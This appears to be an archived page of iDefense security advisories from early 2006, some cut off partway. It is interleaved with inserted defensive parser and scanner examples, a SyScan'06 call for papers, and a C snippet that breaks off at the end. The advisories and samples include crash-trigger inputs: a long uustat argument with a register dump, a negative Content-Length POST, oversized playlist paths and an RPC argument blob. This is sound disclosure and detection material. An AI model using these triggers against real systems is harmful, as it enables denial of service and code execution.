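    if len(path) >= PATH_LIMIT:
        flags.append("long")
    if path.startswith("\\\\"):
        flags.append("unc")       # UNC share name; need not exist (advisory 377)
    if path.lower().endswith(".wma"):
        flags.append("wma")       # .wma extension pattern (advisory 378)
    if "long" not in flags:       # unc/wma on their own are normal playlist content
        return None
    return Finding(fmt, index, len(path), flags)


def scan_playlist(text: str, fmt: str) -> List[Finding]:
    entries = m3u_entries(text) if fmt == "m3u" else pls_entries(text)
    found = []
    for i, path in enumerate(entries, 1):
        f = inspect_entry(fmt, i, path)
        if f:
            found.append(f)
    return found


# Constructed samples: one benign playlist and the three trigger shapes from
# the advisories (long path, long UNC path, long path ending in .wma).
BENIGN_M3U = "#EXTM3U\n#EXTINF:180,Artist - Title\nC:\\Music\\track01.mp3\n"
LONG_M3U = "#EXTM3U\n#EXTINF:,VULN\n" + "A" * 3000 + "\n"
LONG_WMA_M3U = "#EXTM3U\n#EXTINF:,VULN\n" + "A" * 3000 + ".wma\n"
LONG_UNC_PLS = "[playlist]\nnumberofentries=1\nFile1=\\\\01 01" + "A" * 3000 + "\n"

if __name__ == "__main__":
    for name, text, fmt in [("benign", BENIGN_M3U, "m3u"), ("long", LONG_M3U, "m3u"),
                            ("wma", LONG_WMA_M3U, "m3u"), ("unc", LONG_UNC_PLS, "pls")]:
        print(name, scan_playlist(text, fmt))
```

Run it over a directory of playlists from a mail gateway or download cache; an entry with the "long" flag is worth quarantining regardless of the other flags, since length alone is what the two advisories exploit.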




iDefense Security Advisory 01.23.06: Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow Vulnerability

2006-01-26 Thread [EMAIL PROTECTED]
lectronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



Call For Paper - SyScan'06 Singapore

2006-01-25 Thread [EMAIL PROTECTED]

*CALL FOR PAPER*

*ABOUT SYSCAN’06*
The Symposium on Security for Asia Network aims to be a very different 
security conference from the rest of the security conferences that the 
information security community in Asia has come to be so familiar and 
frustrated with. SyScan’06 intends to be a non-product, non-vendor 
biased security conference. It is the aspiration of SyScan’06 to 
congregate, in Singapore, the best security experts in their various 
fields, to share their research, discovery and experience with all 
security enthusiasts in Asia.


The speakers that will be at SyScan’06 are among the best, and 
brightest. These experienced security professionals at the vanguard of 
leading information security technology have assembled unique new 
material that they will present at this conference to help you maintain 
your technological leadership and stay abreast of the latest 
developments in this rapidly moving technological field.


This two-day symposium will be held in a relaxed and informal 
atmosphere, allowing all participants to enjoy themselves whilst 
expanding their knowledge on information security.


SyScan’06 will be held in Singapore in the month of July, 2006.

Besides the main conference, there will also be specialized security 
training courses at SyScan’06. These classes will be held before the 
main conference.


*Speakers'/trainers' privileges*
Speakers at SyScan’06 will enjoy the following privileges.

*Generic Privileges*

   * Return economy class air-ticket for one person.
   * Hotel accommodation.
   * Breakfast, lunch and dinner during conference.
   * After-conference party.
   * A healthy dose of alcohol.

*Special Privileges*

   * *One selected speaker from each category will receive US$1,000
 honorarium in cash. Selection will be based on the following criteria:
 o New presentation not seen in any other conferences before.
   * **Presentations that reveal unpublished/undisclosed
 vulnerabilities/exploits/techniques/malware will receive US$2,000
 honorarium in cash. Selection will be based on the following
 criterion:
 o Critical zero-day vulnerability, or
 o Working exploits (can be reproduced and must have a POC), or
 o New techniques for:
   + Discovery of vulnerability, or
   + Exploiting existing vulnerability
 o New form of malware.

*CFP SUBMISSION*
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously.

2) Proposed presentation title, category, synopsis and description.
3) Contact Information (full name, alias, handle, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary requirement).

4) Employment and/or affiliations information.
5) Any significant presentation and educational experience/background.
6) Why is your material different or innovative or significant or an 
important tutorial?


All submissions must be in English in either MS Office, OpenOffice or 
PDF format. The more information you provide, the better the chance for 
selection. Please send submissions to [EMAIL PROTECTED] 
<mailto:[EMAIL PROTECTED]>. Submissions must be received no later than 30th 
April 2006.


*Important Dates*
Final CFP Submission – 30th April 2006
Notification of Acceptance or Rejection – 15th May 2006
Final Accepted Presentation Material Submission – 30th June 2006


*Topics*
The following categories are the focus for SyScan’06:

64-bit Vista
Mobile Devices
Malware
VoIP
Linux

The scope of each focus area is broad and includes, but is not restricted
to, the following:

*64-bit Vista*

   * Vulnerabilities
 o Kernel
 o Protocols
   * Exploits
 o Kernel
 o Protocols
 o Shellcodes
   * Malware
 o Virus
 o Rootkit
 o Spyware

*Mobile Devices (embedded systems)*

   * Vulnerabilities
 o Operating Systems
 o Applications
   * Exploits
 o Operating Systems
 o Applications
   * Malware
 o Virus

*Malware*

   * Rootkits
   * Spyware

*VoIP*

   * Vulnerabilities
   * Exploits

*Linux*

*BotNets*

*Others*

Any topics that will catch the attention of the CFP committee and/or the 
world.



*OTHER INFORMATION*

Please feel free to visit SyScan’06 <http://www.syscan.org/> website to 
get a feel what this conference is all about – SHARE AND HAVE FUN!


Also look out here for the latest update on SyScan’05.

*It is possible, but not guaranteed, that every category will have a 
speaker who will receive the US$1000 honorarium. The CFP committee of 
SyScan’06 will be the final arbitrator on this matter.


**If your presentation meets the criterion for both categories of 
honorarium, you will receive only the higher honorarium of US$2,000 in 
cash. The CFP committee of SyScan’06 will be the final arbitrator on 
this matter.


By agreeing to speak at the SyScan’06 you are granting SyScan 

iDefense Security Advisory 01.17.06: Cisco Systems IOS 11 Web Service CDP Status Page Code Injection Vulnerability

2006-01-20 Thread [EMAIL PROTECTED]
tp://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 01.17.06: EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability

2006-01-20 Thread [EMAIL PROTECTED]

EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=374
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in EMC Corp.'s
Legato Networker allows attackers to execute arbitrary code on Windows
platforms.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390113. When such a request
is sent by an attacker, it is possible to overwrite portions of heap
memory, thus leading to arbitrary code execution by way of a function
pointer overwrite. If an attacker can populate memory so that his data
is in a predictable location, arbitrary code execution is possible. It
is possible to populate memory in several ways, including by utilizing
memory leaks.

III. ANALYSIS

Successful exploitation allows a remote attacker to gain access to a
targeted machine. As nsrd.exe is installed on backup client machines
as well as server machines, an attacker may rapidly compromise a
network using this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3658 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe DoS Vulnerability

2006-01-20 Thread [EMAIL PROTECTED]

EMC Legato Networker nsrd.exe DoS Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=375
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in EMC Corp.'s
Legato Networker allows attackers to crash the nsrd service.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390109. By sending such a
request, an attacker is able to cause a NULL pointer to be used as the
base in a memory reference, which leads to a crash of the service. The
daemon will crash on a NULL pointer dereference as no exception handlers
are invoked which might allow it to recover.

III. ANALYSIS

Successful exploitation allows a remote attacker to crash the nsrd.exe
process.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

 http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3659 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
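
Both NetWorker advisories above identify the affected service only by its ONC RPC program number (390113 for the nsrexecd heap overflow, 390109 for the nsrd crash), which is exactly the field a network sensor has to pull out of the traffic to see who is talking to those daemons. The parser below is an added example for this page, not iDefense's or EMC's code: it decodes an RPC CALL header per RFC 1831/5531 (including the TCP record mark) and flags calls to the two watched program numbers, reporting how many argument bytes follow the header. The sample records are constructed here, and the procedure numbers in them are arbitrary; the advisories do not describe the malformed request itself.

```python
"""Parse ONC RPC CALL headers (RFC 1831 / RFC 5531) and flag calls to the
NetWorker program numbers named in the two advisories.

Added example, not iDefense's or EMC's code. Sample traffic is constructed;
the procedure numbers used in it are made up.
"""
import struct
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional, Tuple

RPC_CALL = 0
RPC_VERSION = 2

# Program numbers taken from the two advisories.
WATCHED_PROGRAMS = {
    390113: "nsrexecd (CAN-2005-3658, heap overflow)",
    390109: "nsrd (CAN-2005-3659, NULL dereference DoS)",
}


@dataclass
class RpcCall:
    xid: int
    prog: int
    vers: int
    proc: int
    cred_flavor: int
    cred_len: int
    payload_len: int        # bytes after the verifier, i.e. procedure arguments


def parse_rpc_call(record: bytes, tcp: bool = True) -> Optional[RpcCall]:
    """Parse one RPC CALL. With tcp=True the record starts with the 4-byte
    record-marking header (high bit = last fragment, low 31 bits = length).
    Returns None for replies, truncated data, or anything malformed."""
    off = 0
    if tcp:
        if len(record) < 4:
            return None
        (mark,) = struct.unpack_from(">I", record, 0)
        frag_len = mark & 0x7FFFFFFF
        if len(record) - 4 < frag_len:
            return None                      # truncated fragment
        record = record[:4 + frag_len]
        off = 4
    if len(record) - off < 24:
        return None
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack_from(">6I", record, off)
    off += 24
    if msg_type != RPC_CALL or rpcvers != RPC_VERSION:
        return None

    def opaque_auth(o: int) -> Tuple[int, int, int]:
        # opaque_auth = flavor, length, body padded to a 4-byte boundary
        if len(record) - o < 8:
            raise ValueError("short opaque_auth")
        flavor, length = struct.unpack_from(">II", record, o)
        if length > 400:                     # RFC 5531: body is opaque<400>
            raise ValueError("oversized opaque_auth")
        padded = (length + 3) & ~3
        if len(record) - o - 8 < padded:
            raise ValueError("short opaque_auth body")
        return flavor, length, o + 8 + padded

    try:
        cred_flavor, cred_len, off = opaque_auth(off)   # credential
        _, _, off = opaque_auth(off)                    # verifier
    except ValueError:
        return None
    return RpcCall(xid, prog, vers, proc, cred_flavor, cred_len, len(record) - off)


def classify(call: RpcCall) -> Optional[str]:
    """Advisory label for a call to a watched program, else None."""
    return WATCHED_PROGRAMS.get(call.prog)


def build_call(xid: int, prog: int, vers: int, proc: int, args: bytes = b"") -> bytes:
    """Build a minimal AUTH_NULL call with TCP record mark (test traffic only)."""
    body = struct.pack(">6I", xid, RPC_CALL, RPC_VERSION, prog, vers, proc)
    body += struct.pack(">II", 0, 0)         # cred: AUTH_NULL, empty body
    body += struct.pack(">II", 0, 0)         # verf: AUTH_NULL, empty body
    body += args
    return struct.pack(">I", 0x80000000 | len(body)) + body


def scan(records: Iterable[bytes]) -> Iterator[Tuple[int, str, int]]:
    """Yield (xid, label, payload_len) for every call to a watched program."""
    for rec in records:
        call = parse_rpc_call(rec)
        if call is None:
            continue
        label = classify(call)
        if label:
            yield call.xid, label, call.payload_len


# Constructed samples: a call to the nsrexecd program carrying a 2000-byte
# argument blob, and a benign portmapper (program 100000) GETPORT lookup.
SAMPLE_NSREXEC = build_call(0x1234, 390113, 1, 7, b"\x41" * 2000)
SAMPLE_PORTMAP = build_call(0x1235, 100000, 2, 3, struct.pack(">IIII", 390113, 1, 6, 0))

if __name__ == "__main__":
    for hit in scan([SAMPLE_NSREXEC, SAMPLE_PORTMAP]):
        print("xid=%#x %s args=%d bytes" % hit)
```

Feeding reassembled TCP payloads from the NetWorker ports into scan() gives a per-connection list of who is calling the two daemons and with how large an argument block, which is the signal to alert on while the hot-fix is rolled out.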



iDefense Security Advisory 01.13.06: Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

2006-01-13 Thread [EMAIL PROTECTED]

Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

iDefense Security Advisory 01.13.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 13, 2006

I. BACKGROUND

Novell SUSE Linux Enterprise Server is a platform for open source
computing in an enterprise environment.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
Open Enterprise Server Remote Manager allows attackers to execute
arbitrary code.

III. ANALYSIS

The vulnerability specifically exists due to improper handling of an
HTTP POST request with a negative Content-Length parameter. When such a
request is received, controllable heap corruption occurs which can lead
to the execution of arbitrary code using traditional Linux heap overflow
methods. The following HTTP request can be used to trigger this
vulnerability.

 POST / HTTP/1.0
 Content-Length: -900

 DATA_THAT_WILL_BE_USED_TO_OVERWRITE_THE_HEAP

iDefense Labs testing has determined that with careful manipulation of
the string, an arbitrary 4 byte write may be achieved which can be used
to gain execution control.

IV. DETECTION

iDefense has confirmed this vulnerability in Novell SUSE Linux
Enterprise Server 9. All previous versions are suspected vulnerable.
Novell SUSE Linux Enterprise Server components are included in Novell
Open Enterprise Server; as such, Open Enterprise Server is also
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Novell has released the following advisories to address this issue:

 http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html
 
http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html


SUSE has released the following advisories to address this issue:

 http://www.novell.com/linux/security/advisories/2006_02_novellnrm.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3655 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/15/2005  Initial vendor response
01/13/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 01.10.06: Sun Solaris uustat Buffer Overflow Vulnerability

2006-01-10 Thread [EMAIL PROTECTED]

Sun Solaris uustat Buffer Overflow Vulnerability

iDefense Security Advisory 01.10.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=366
January 10, 2006

I. BACKGROUND

The uustat binary (part of the uucp project) is used to display or
cancel uucp requests as well as to provide general status on uucp
connections to other systems.

II. DESCRIPTION

There exists a buffer overflow vulnerability in the /usr/bin/uustat
binary in Sun Solaris 5.8 and 5.9.

The uustat binary is installed setuid "uucp" by default on Solaris. The
"-S" command line argument causes the binary to crash when followed
with a string that is greater than or equal to 1152 bytes in length.

The following shows the buffer being overflowed and then the o1
register being completely overwritten with the letter 'A':

bash-2.03% ls -l /usr/bin/uustat
---s--x--x   1 uucp     uucp       62012 Jan 17 16:07 uustat

bash-2.03$ /usr/bin/uustat -S `perl -e 'print "A"x3000'`
Segmentation Fault
bash-2.03$
(gdb) info registers
g0             0x0          0
g1             0xff315e98   -13541736
g2             0x1cc00      117760
g3             0x440        1088
g4             0x0          0
g5             0x0          0
g6             0x0          0
g7             0x0          0
o0             0xff3276a8   -13470040
o1             0x41414141   1094795585
...

III. ANALYSIS

By exploiting this buffer overflow, an attacker can potentially gain
control of the return address of the executing function, allowing
arbitrary code execution with "uucp" privileges.

IV. DETECTION

Solaris 8 and 9 running on the SPARC and x86 architectures are
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

 http://sunsolve.sun.com/search/document.do?assetkey=1-26-101933-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0780 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/11/2004   Initial vendor contact
08/11/2004   Initial vendor response
01/10/2006   Coordinated public disclosure

IX. CREDIT

Angelo Rosiello (http://www.rosiello.org) is credited with discovering
this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability

2006-01-09 Thread [EMAIL PROTECTED]
www.redhat.com/archives/fedora-announce-list/2006-January/msg00015.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3656 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/22/2005  Initial vendor response
01/09/2006  Coordinated public disclosure

IX. CREDIT

The discovery of this vulnerability is credited to Sparfell.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 01.05.06: Blue Coat WinProxy Telnet DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat WinProxy Telnet DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability can be triggered by sending a large string of 0xFF
characters to the telnet proxy port of the server. Sending such a string
will cause a heap corruption in the Winproxy process causing it to
crash.

III. ANALYSIS

Successful exploitation requires an attacker to send a stream of TCP
packets containing the 0xFF character to the WinProxy telnet server on
TCP port 23. This will lead to a crash of the server and it will be
unusable until it is restarted.

In lab tests, the heap corruption caused by this exploit led to crashes
at random locations in the process. Remote code execution may be
possible, but controlling the corruption well enough to maintain
reliable code execution will likely be very hard.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0.

All previous versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy telnet protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3654 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/15/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
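
The trigger in the advisory above is a stream of nothing but 0xFF bytes, which in telnet is the IAC (Interpret As Command) escape; a parser that reads past the escape without checking what follows, or buffers commands without bound, is what turns that stream into heap corruption. The following is an added example for this page, not Blue Coat's code: a bounded RFC 854 command-layer parser that resolves IAC IAC to a literal 0xFF, handles negotiation and subnegotiation with explicit length checks, and counts rather than trusts anything truncated or oversized. MAX_SUBNEG is an assumed cap on subnegotiation payloads; RFC 854 sets no limit.

```python
"""Bounded telnet command-layer parser (RFC 854/855) that handles an all-0xFF
stream, as in the WinProxy advisory, with constant state and no growth.

Added example, not Blue Coat's code. MAX_SUBNEG is an assumed cap.
"""
from dataclasses import dataclass
from typing import List, Tuple

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
NEGOTIATE = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
MAX_SUBNEG = 256          # assumed cap on subnegotiation payload bytes


@dataclass
class TelnetResult:
    data: bytes                 # application bytes, IAC escapes resolved
    commands: List[Tuple]       # ("WILL", opt), ("SB", payload), ("CMD", code)
    dropped: int                # truncated, malformed or oversized sequences


def parse_telnet(stream: bytes) -> TelnetResult:
    data = bytearray()
    commands: List[Tuple] = []
    dropped = 0
    i, n = 0, len(stream)
    while i < n:
        b = stream[i]
        if b != IAC:
            data.append(b)
            i += 1
            continue
        if i + 1 >= n:                      # lone IAC at end of buffer
            dropped += 1
            break
        cmd = stream[i + 1]
        if cmd == IAC:                      # IAC IAC is a literal 0xFF data byte
            data.append(0xFF)
            i += 2
        elif cmd in NEGOTIATE:              # IAC DO/DONT/WILL/WONT <option>
            if i + 2 >= n:
                dropped += 1
                break
            commands.append((NEGOTIATE[cmd], stream[i + 2]))
            i += 3
        elif cmd == SB:                     # IAC SB <option> ... IAC SE
            payload = bytearray()
            j = i + 2
            ok = False
            while j < n and len(payload) <= MAX_SUBNEG:
                if stream[j] != IAC:
                    payload.append(stream[j])
                    j += 1
                elif j + 1 < n and stream[j + 1] == IAC:   # escaped 0xFF inside SB
                    payload.append(0xFF)
                    j += 2
                elif j + 1 < n and stream[j + 1] == SE:    # proper terminator
                    ok = True
                    j += 2
                    break
                else:
                    break                   # IAC <other> inside SB: malformed
            if ok:
                commands.append(("SB", bytes(payload)))
            else:
                dropped += 1                # oversized, truncated or malformed
            i = j                           # j >= i + 2, so we always make progress
        else:                               # other two-byte commands (NOP, AYT, ...)
            commands.append(("CMD", cmd))
            i += 2
    return TelnetResult(bytes(data), commands, dropped)


# Constructed samples: the advisory's trigger shape, and a normal session
# fragment with one option negotiation and one subnegotiation.
FF_FLOOD = b"\xff" * 3000
NEGOTIATION = b"\xff\xfb\x18hello\xff\xfa\x18\x00VT100\xff\xf0world"

if __name__ == "__main__":
    for name, sample in (("flood", FF_FLOOD), ("session", NEGOTIATION)):
        r = parse_telnet(sample)
        print(name, len(r.data), "data bytes,", r.commands, "dropped=%d" % r.dropped)
```

The flood case decodes to 1500 literal 0xFF data bytes and nothing else; every branch reads at most two bytes beyond the current index before checking it exists, and the only buffer that grows with attacker input is capped by MAX_SUBNEG.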


iDefense Security Advisory 01.05.06: Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Blue Coat
Systems Inc.'s WinProxy allows for the remote execution of arbitrary
code by attackers.

The vulnerability can be triggered by sending an overly long Host:
string to the web proxy service.

III. ANALYSIS

Exploitation of this vulnerability is trivial. An overly long header
directly overwrites the SEH handler for the frame allowing for control
over EIP.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy web proxy protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/07/2005  Initial vendor notification
12/08/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
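The Host: header overflow described above, illustrated as an added example that is not WinProxy's code (its internals are not public): a fixed-size stack copy with no length check next to a header parser that refuses oversized values before any copy happens. The buffer size HOST_BUF, the function names and the sample requests are assumptions made for the demonstration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define HOST_BUF 256   /* hypothetical buffer size; not WinProxy's actual layout */

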